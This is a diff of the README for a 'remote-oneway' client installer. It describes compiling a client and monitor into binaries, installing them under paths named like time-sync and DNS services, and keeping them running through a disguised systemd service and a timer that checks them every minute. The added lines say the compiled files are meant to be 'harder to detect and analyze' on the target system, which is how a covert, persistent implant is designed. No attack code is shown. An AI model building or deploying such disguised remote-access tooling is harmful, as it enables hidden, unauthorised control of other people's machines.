aKamrani/remote-oneway/client/README.md

 The script will:
 - Read configuration from `.env` file
+- Install Python dependencies (netifaces, pyinstaller)
 - Embed configuration directly into the client script
+- **Compile both scripts to standalone binary executables**
-- Install the client script to `/etc/ntpsync/ntp`
+- Install the client binary to `/etc/ntpsync/ntp`
-- Install monitor script to `/etc/dnsresolve/conf`
+- Install monitor binary to `/etc/dnsresolve/conf`
 - Create and enable the `ntpsyncd` systemd service
 - Create and enable the `dnsresolv` systemd timer (monitors the service every minute)
 - Start the client service

-**Note**: Configuration is embedded directly into the installed script (`/etc/ntpsync/ntp`), so no separate `.env` file exists on the target system.
+**Important**: The installed files are compiled binaries, not Python scripts.
+The source code is not visible on the target system, making them harder to detect and analyze.

 ### Uninstallation